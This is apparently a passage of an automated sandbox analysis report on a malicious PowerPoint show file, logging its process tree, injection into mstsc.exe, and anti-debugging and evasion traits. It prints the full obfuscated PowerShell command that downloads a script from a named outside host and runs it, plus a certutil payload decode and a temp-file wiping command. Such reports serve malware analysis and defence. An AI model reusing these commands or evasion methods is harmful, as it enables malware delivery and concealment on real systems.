Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;1504&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;1524&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;1840&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;848&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;1808&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;1704&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;1900&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;520&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;1124&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;952&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;2256&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;2324&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;2496&quot;::GetOwner
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\powerpnt.exe' /s 'C:\order.ppsx'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\LUKETA~1\AppData\Local\Temp\ii.jse'
Source: unknownProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: unknownProcess created: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /U /Q /C del /Q/F %TEMP%\*.exe && del /Q/F %TEMP%\*.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\*.log && del /Q/F %TEMP%\*.jse
Source: unknownProcess created: C:\Windows\System32\mstsc.exe C:\Windows\System32\mstsc.exe 'C:\Users\LUKETA~1\AppData\Local\Temp\484.exe'
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\LUKETA~1\AppData\Local\Temp\ii.jse'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /U /Q /C del /Q/F %TEMP%\*.exe && del /Q/F %TEMP%\*.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\*.log && del /Q/F %TEMP%\*.jse
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeProcess created: C:\Windows\System32\mstsc.exe C:\Windows\System32\mstsc.exe 'C:\Users\LUKETA~1\AppData\Local\Temp\484.exe'
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Contains functionality to call native functionsShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040F995 GetProcessHeap,CreateProcessW,GetProcessHeap,HeapAlloc,GetShellWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcAddress,NtCreateSection,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,10_2_0040F995
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040F6F4 GetProcessHeap,GetProcessHeap,HeapAlloc,GetClipboardSequenceNumber,GetProcessHeap,HeapAlloc,GetShellWindow,GetModuleHandleA,GetProcAddress,NtMapViewOfSection,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,10_2_0040F6F4
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_0006E0EF NtQuerySystemInformation,GetProcessHeap,GetProcessHeap,HeapAlloc,GetShellWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,ReleaseCapture,LoadLibraryA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,NtQuerySystemInformation,NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,VirtualFree,13_2_0006E0EF
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_004064D2 OpenProcess,ProcessIdToSessionId,CloseHandle,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,SetTokenInformation,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,SetTokenInformation,CreateEnvironmentBlock,GetProcessHeap,HeapAlloc,GetCaretBlinkTime,GetProcessHeap,HeapAlloc,CreatePopupMenu,CreateProcessAsUserW,CloseHandle,OpenProcessToken,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,10_2_004064D2
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_00401D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree,10_2_00401D22
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_00061D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree,13_2_00061D22
Creates files inside the system directoryShow sources
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cerF439.tmp
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Deletes Windows filesShow sources
Source: C:\Windows\System32\certutil.exeFile deleted: C:\Windows\cerF439.tmp
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: api-ms-win-appmodel-runtime-l1-1-2.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: api-ms-win-appmodel-runtime-l1-1-0.dll

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to add an ACL to a security descriptorShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040D8BA AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityW,FreeSid,LocalFree,LocalFree,LocalFree,10_2_0040D8BA
Contains functionality to create a new security descriptorShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_004064D2 OpenProcess,ProcessIdToSessionId,CloseHandle,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,SetTokenInformation,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,SetTokenInformation,CreateEnvironmentBlock,GetProcessHeap,HeapAlloc,GetCaretBlinkTime,GetProcessHeap,HeapAlloc,CreatePopupMenu,CreateProcessAsUserW,CloseHandle,OpenProcessToken,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,10_2_004064D2
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: wscript.exe, mstsc.exeBinary or memory string: Progman
Source: wscript.exe, mstsc.exeBinary or memory string: Program Manager
Source: wscript.exe, mstsc.exeBinary or memory string: Shell_TrayWnd
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Maps a DLL or memory area into another processShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeSection loaded: unknown target pid: 3140 protection: execute and read and write
Writes to foreign memory regionsShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeMemory written: C:\Windows\System32\mstsc.exe base: E384EC
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeMemory written: C:\Windows\System32\mstsc.exe base: E384ED
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeMemory written: C:\Windows\System32\mstsc.exe base: E384EE
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeMemory written: C:\Windows\System32\mstsc.exe base: E384EF
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeMemory written: C:\Windows\System32\mstsc.exe base: E384F0
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.159.82.38 200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 46.21.169.110 80

Anti Debugging:

barindex
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0041FFF1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0041FFF1
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_00420488 SetUnhandledExceptionFilter,10_2_00420488
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_004224C7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004224C7
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_1_0041FFF1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_1_0041FFF1
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_1_004224C7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_1_004224C7
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0041FFF1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0041FFF1
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040EFB9 EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,LoadLibraryA,GetProcAddress,GetCommandLineW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,IsSystemResumeAutomatic,GetProcessHeap,GetModuleHandleW,ExitProcess,GetCurrentProcess,GetVersion,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetActiveWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,StrStrIW,StrStrIW,StrStrIW,CreateThread,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,Sleep,10_2_0040EFB9
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040F995 GetProcessHeap,CreateProcessW,GetProcessHeap,HeapAlloc,GetShellWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcAddress,NtCreateSection,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,10_2_0040F995
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_004022E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_004022E6
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040DDBF
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_00401E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_00401E16
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040BB40
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_00061E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_00061E16
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_000622E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_000622E6
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_0006BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_0006BB40
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_0006DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_0006DDBF
Contains functionality to query system informationShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040C055 GetProcessHeap,GetProcessHeap,HeapAlloc,IsSystemResumeAutomatic,GetProcessHeap,HeapAlloc,GetClipboardSequenceNumber,GetModuleHandleA,GetProcAddress,GlobalMemoryStatusEx,GetSystemInfo,GetProcessHeap,HeapAlloc,GetDesktopWindow,RegOpenKeyW,HeapFree,GetProcessHeap,HeapAlloc,GetClipboardViewer,RegQueryValueExW,HeapFree,GetProcessHeap,HeapAlloc,CountClipboardFormats,StrStrIW,StrStrIW,Sleep,StrStrIW,GetProcessHeap,HeapFree,HeapFree,RegCloseKey,GetProcessHeap,HeapFree,Sleep,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040C055
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Checks the free space of harddrivesShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile Volume queried: C:\Windows\System32 FullSizeInformation
Contains capabilities to detect virtual machinesShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Contains functionality to detect sandboxes (foreground window change detection)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,ReleaseCapture,ExpandEnvironmentStringsW,GetShortPathNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,wsprintfW,GetProcessHeap,GetProcessHeap,HeapAlloc,RevertToSelf,CoInitializeEx,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,LoadLibraryA,GetProcAddress,GetLastError,Sleep,GetForegroundWindow,CoUninitialize,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040A0EE
Source: C:\Windows\System32\mstsc.exeCode function: GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,ReleaseCapture,ExpandEnvironmentStringsW,GetShortPathNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,wsprintfW,GetProcessHeap,GetProcessHeap,HeapAlloc,RevertToSelf,CoInitializeEx,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,LoadLibraryA,GetProcAddress,GetLastError,Sleep,GetForegroundWindow,CoUninitialize,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_0006A0EE
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: -922337203685477
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Found evasive API chain (may stop execution after accessing registry keys)Show sources
Source: C:\Windows\System32\mstsc.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_13-3213
Found large amount of non-executed APIsShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeAPI coverage: 5.3 %
Source: C:\Windows\System32\mstsc.exeAPI coverage: 4.7 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448Thread sleep time: -922337203685477s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 2536Thread sleep time: -120000s >= -60s
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe TID: 3080Thread sleep time: -31000s >= -60s
Source: C:\Windows\System32\mstsc.exe TID: 3144Thread sleep time: -10000s >= -60s
Source: C:\Windows\System32\mstsc.exe TID: 3144Thread sleep time: -10000s >= -60s
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\System32\mstsc.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_13-3133
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_10-12082
Found stalling execution ending in API Sleep callShow sources
Source: C:\Windows\System32\mstsc.exeStalling execution: Execution stalls by calling Sleepgraph_13-3220
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\mstsc.exeLast function: Thread delayed

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeProcess information set: FAILCRITICALERRORS and NOGPFAULTERRORBOX
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeProcess information set: NOOPENFILEERRORBOX
